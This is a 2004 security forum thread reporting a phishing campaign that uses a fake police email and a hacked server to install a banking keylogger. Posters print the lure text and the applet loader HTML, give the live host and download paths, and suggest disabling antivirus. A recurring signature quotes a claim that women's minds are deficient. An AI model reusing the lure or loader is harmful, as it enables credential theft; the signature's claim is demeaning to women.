-
February 16th, 2004, 06:18 PM
#1
owned as we speak
how current can you get? though you might like to take a look a crime in progress
220-Connecting To MegaCrew's l337 FTP Server....
220-.:::::::::::::::::::::::
220-.::: ____________________________________________________
220-.:::| ╕,°ñ░`░ñ°,╕╕╕╕╕╕╕╕╕╕╕
220-.:::| .Welcome to
220-.:::| MegaCrew
220-.:::| ``````````░ñ°,╕╕,°ñ░`
220-.:::|____________________________________________________
220-.:::::::::::::::::::::::
220-.:::|____________________________________________________
220-.:::| USER INFO:
220-.:::|
220-.:::| ñ Your IP Address : xx.xxx.xx.xxx
220-.:::| ñ Current Time : 11:55:34
220-.:::| ñ Current Date : Monday 16 February, 2004
220-.:::|____________________________________________________
220-.:::::::::::::::::::::::
This is from the server used to download a keylogger that looks only for info on bank accounts then emails it to an '.ru' mail server. the originating address of the email is in china which is no doubt owned by someone from somewhere else.
victims are lured to a website threw an email:
Hello...
It has come to my attention that you are being under the police investigation.
Is that true? Have you really commited such crimes?
Please read the following article located at:
http://federalpolice.com:article872[...#39;1075686747
where they see what appears to be a server error page which is actually a web page made to download an executable (threw the mime type vuln) which is named javautil.zip and execute it.
the web server that is being used is a completly owned server. (its really disgraceful)
the hacked server is still up '1075686747' for anyone wanting to get a first hand look at it but the police have been notified and are probably watching it.
more info:
http://spamwatch.codefish.net.au/mod...article&sid=55
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
February 16th, 2004, 06:46 PM
#2
good work tedbob...how long have u been trackin this? how'd u find all this out? do they set up a backdoor also along with a keylogger?
-
February 16th, 2004, 06:54 PM
#3
Hmm. I saw an advisory about this one this morning. The advisory is from a payed security firm so I cannot post the info here.
Good find!
BE CAREFUL if you downloaded the javautil.zip (for educational puposes ) it's NOT a zipfile but an executable.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
February 16th, 2004, 07:03 PM
#4
This one started over the weekend. The first bits came out late Saturday and I've suggested to the original poster to get Antiphishing.com to look into posting it as well.
-
February 16th, 2004, 07:22 PM
#5
Junior Member
I just wanted to know how the javautil.zip can be made to auto - execute in one's machine; is it because the file is really called javautil.exe? maybe this is a stupid question, but maybe you could tell me what the mime type vun looks like to be aware when opening different webpages.
Don't you have your internet settings set so that there has to be authorization before a download is made into your computer?
Imagination is greater than intelligence when referring to intricate things, the reason why is that if you can\'t imagine how something works, how do you expect to understand it and therefore to know anything about it.
Imagination, Precious
-
February 16th, 2004, 07:38 PM
#6
the web server that is being used is a completly owned server. (its really disgraceful)
*ROTFLMAO*
Holy crap! When you said completly you weren't kidding. Anybody else see that mess?
Not only does it look like 3 seperate doors, it appears as if they didn't even need them in the first place. No pun intended.
This is a perfect example of why you need to lock down your machines. Not just patched either. Learn how some of this stuff actually works, if you don't need it disable it. Granted some of this stuff could of been enabled by the attacker.
Good find Tedob1 thanks for the humor.
/edit corrected name OOPS!
-
February 16th, 2004, 07:47 PM
#7
no prob. ive been called much much worse.
to add insult to injury the perps are using netbus.
epolgar:
http://secunia.com/advisories/10736/
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
February 16th, 2004, 10:00 PM
#8
an added note from full-disclosure:
"one major issue left out by that link is the fact that it is not just a
keylogger, it also rapes the Protected Storage Subsystem, as is obvious
by the fact that it imports pstorec.dll, and calls PStoreCreateInstance.
Another interesting thing to note is that it can be uninstalled by
finding the EXE and running it with the "Uninstall" flag... "
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
February 16th, 2004, 10:15 PM
#9
I wonder if my firewall would catch it...is it safe to click on that link without having it execute on my PC. I'm using win2k/XP dual boot. Connected through 2k rite now. I would like to tear the program they're using appart to see what I learn from it. If you have the file, would you be able to post it as an attachment for me please.
-
February 16th, 2004, 10:26 PM
#10
64.29.173.91
After you connect it servers you the files automaticaly via an applet
here is the html
<HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></BODY></HTML>
if you connect
64.29.173.91/blackbox.class
64.29.173.91/javautil.zip
you can save them that way
hope this helps
Norton will pick up blackbox.class so if you wanna keep it kill norton or any other AV for a moment.
Use at your own discretion
hope this helps
Your heart was talking, not your mind.
-Tiger Shark
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|